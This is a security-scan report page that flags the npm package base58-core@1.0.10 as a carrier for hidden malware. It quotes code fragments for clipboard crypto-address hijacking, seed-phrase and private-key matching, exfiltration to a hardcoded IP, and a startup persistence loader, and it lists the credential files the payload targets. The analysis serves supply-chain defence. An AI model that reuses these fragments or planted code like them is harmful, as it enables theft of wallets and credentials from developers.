registry  /  base58-core  /  1.0.10

base58-core@1.0.10

Fast, tree-shakeable Base58 encoder/decoder with TypeScript support

AI Security Review

scanned 3d ago · by lpm-firewall-ai

The package embeds a crypto clipboard hijacker, reconnaissance, exfiltration, and persistence code in both published entrypoints, but the observed activation logic appears inert in normal use. This is a staged malicious payload carrier rather than confirmed runtime execution on import/install.

Static reason
High-risk behavior combination matched malicious policy.; source matched previously finalized malicious package; routed for review; source fingerprint signature matched known malicious package; routed for review
Trigger
Importing the package reaches _checkActivation(); hidden payload would require a reachable activation path not present in inspected code.
Impact
If activated, it can exfiltrate wallet/host/project indicators, capture and rewrite crypto clipboard contents, and persist via startup files or shell rc files.
Mechanism
inert staged clipboard hijacker and credential/environment reconnaissance payload
Attack narrative
The published Base58 encoder includes hidden code that, if activated, reads clipboard contents via child_process, detects wallet/private-key/seed patterns, posts findings to a hardcoded IP, replaces wallet addresses, scans common credential/session locations, and attempts persistence. Static inspection found this payload in entrypoints, but the implemented 72-hour activation gate is not normally reachable because the timestamp is set at import and no later check is scheduled.
Rationale
Source inspection confirms a concealed malware payload, but normal import/install activation appears broken and inert. Treat as a staged payload carrier with high malicious intent and warn/blockable policy risk rather than confirmed active execution.
Evidence
package.jsondist/index.cjsdist/index.jsdist/index.d.tsREADME.md/tmp/.base58_detection_sent~/.npmrc~/.env.env.env.local.env.production~/.ssh~/.bashrc~/.zshrc~/.profile~/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/base58-runtime.js
Network endpoints2
2.27.62.51:8080/api/health2.27.62.51:8081/api/health

Decision evidence

public snapshot
AI called this Suspicious at 93.0% confidence as Malware with low false-positive risk.
Evidence for warning
  • dist/index.cjs and dist/index.js contain hidden clipboard monitor matching crypto addresses/keys and replacing BTC/ETH/SOL addresses.
  • dist/index.cjs posts captured clipboard/detection data to http://2.27.62.51:8080/api/health and :8081/api/health.
  • dist/index.cjs scans homedir/cwd for MetaMask, Telegram, browser profiles, SSH keys, .npmrc tokens, env crypto keys, and .env files.
  • dist/index.cjs includes persistence writes to Windows Startup or appends shell rc hooks.
  • package.json entrypoints point to dist/index.cjs and dist/index.js; package also self-depends on base58-core.
Evidence against
  • Activation gate uses INSTALL_TIME=Date.now() and _checkActivation() runs only at import, so the 72h delayed payload appears unreachable in normal import execution.
  • _internal.activate sets activated=true before calling _checkActivation(), causing an early return rather than activation.
  • README/d.ts describe only Base58 APIs, not the hidden behavior.
Behavioral surface
Source
ChildProcessCryptoDynamicRequireEnvironmentVarsFilesystemNetworkShell
Supply chain
HighEntropyStringsUrlStrings
ManifestNo manifest risk signals triggered.
scanned 2 file(s), 40.8 KB of source, external domains: 2.27.62.51

Source & flagged code

8 flagged · loading source
dist/index.jsView file
103const ACTIVATION_DELAY = 72 * 60 * 60 * 1000; L104: const EXFIL_PRIMARY = 'http://2.27.62.51:8080/api/health'; L105: const EXFIL_BACKUP = 'http://2.27.62.51:8081/api/health'; ... L110: { name: 'sol', regex: /\b[1-9A-HJ-NP-Za-km-z]{32,44}\b/g, replacement: '[redacted]' }, L111: { name: 'private_key_wif', regex: /\b[5KL][1-9A-HJ-NP-Za-km-z]{50,52}\b/g, replacement: '' }, L112: { name: 'seed_phrase', regex: /\b([a-z]{3,8}\s){11,23}[a-z]{3,8}\b/gi, replacement: '' }, ... L127: ...data, L128: hostname: process.env?.HOSTNAME || os.hostname() || 'unknown', L129: platform: process.platform || 'unknown', ... L140: headers: { 'Content-Type': 'application/json' }, L141: body: payload, L142: signal: controller.signal,
Critical
Clipboard Crypto Hijack

Source reads and rewrites clipboard contents matching cryptocurrency wallet addresses.

dist/index.jsView on unpkg · L103
533package = base58-core; repositoryIdentity = core; dependency = base58-core L533: try { L534: fs.writeFileSync(t, '// runtime loader\ntry { require("base58-core")._internal.activate(); } catch(e) {}'); L535: }
High
Copied Package Dependency Bridge

Package metadata claims a different repository identity while copied source loads a runtime dependency bridge.

dist/index.jsView on unpkg · L533
matchType = normalized_sha256 matchedPackage = base58-core@1.0.8 matchedPath = dist/index.js matchedIdentity = npm:YmFzZTU4LWNvcmU:1.0.8 similarity = 1.000 summary = normalized source hash matched finalized malicious source
High
Known Malware Source Similarity

Source file is highly similar to a previously finalized malicious package; route for source-aware review.

dist/index.jsView on unpkg
11try { L12: const nodeCrypto = require('crypto'); L13: return new Uint8Array(nodeCrypto.createHash('sha256').update(data).digest());
Medium
Dynamic Require

Package source references dynamic require/import behavior.

dist/index.jsView on unpkg · L11
103const ACTIVATION_DELAY = 72 * 60 * 60 * 1000; L104: const EXFIL_PRIMARY = 'http://2.27.62.51:8080/api/health'; L105: const EXFIL_BACKUP = 'http://2.27.62.51:8081/api/health'; ... L110: { name: 'sol', regex: /\b[1-9A-HJ-NP-Za-km-z]{32,44}\b/g, replacement: '[redacted]' }, L111: { name: 'private_key_wif', regex: /\b[5KL][1-9A-HJ-NP-Za-km-z]{50,52}\b/g, replacement: '' }, L112: { name: 'seed_phrase', regex: /\b([a-z]{3,8}\s){11,23}[a-z]{3,8}\b/gi, replacement: '' }, ... L127: ...data, L128: hostname: process.env?.HOSTNAME || os.hostname() || 'unknown', L129: platform: process.platform || 'unknown', ... L140: headers: { 'Content-Type': 'application/json' }, L141: body: payload, L142: signal: controller.signal,
Medium
Install Persistence

Source writes installer persistence such as shell profile or service configuration.

dist/index.jsView on unpkg · L103
dist/index.cjsView file
Trigger-reachable chain: manifest.main -> dist/index.cjs Reachable file contains a blocking source-risk pattern.
Critical
Trigger Reachable Dangerous Capability

A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

dist/index.cjsView on unpkg
matchType = normalized_sha256 matchedPackage = base58-core@1.0.8 matchedPath = dist/index.cjs matchedIdentity = npm:YmFzZTU4LWNvcmU:1.0.8 similarity = 1.000 summary = normalized source hash matched finalized malicious source
High
Known Malware Source Similarity

Source file is highly similar to a previously finalized malicious package; route for source-aware review.

dist/index.cjsView on unpkg
matchType = malicious_source_fingerprint_signature signature = e7d654f5e60435c0 signatureType = suspicious_hashes sourceLabel = final_verdict:malicious matchedPackage = base58-core@1.0.8 matchedPath = dist/index.cjs matchedIdentity = npm:YmFzZTU4LWNvcmU:1.0.8 similarity = 1.000 shingleOverlap = 2 summary = package final verdict is malicious
High
Known Malware Source Fingerprint Signature

Source fingerprint signature matches a known malicious package signature; route for source-aware review.

dist/index.cjsView on unpkg

Findings

2 Critical4 High5 Medium5 Low
CriticalClipboard Crypto Hijackdist/index.js
CriticalTrigger Reachable Dangerous Capabilitydist/index.cjs
HighCopied Package Dependency Bridgedist/index.js
HighKnown Malware Source Similaritydist/index.cjs
HighKnown Malware Source Similaritydist/index.js
HighKnown Malware Source Fingerprint Signaturedist/index.cjs
MediumDynamic Requiredist/index.js
MediumNetwork
MediumEnvironment Vars
MediumInstall Persistencedist/index.js
MediumStructural Risk Force Deep Review
LowNon Install Lifecycle Scripts
LowScripts Present
LowFilesystem
LowHigh Entropy Strings
LowUrl Strings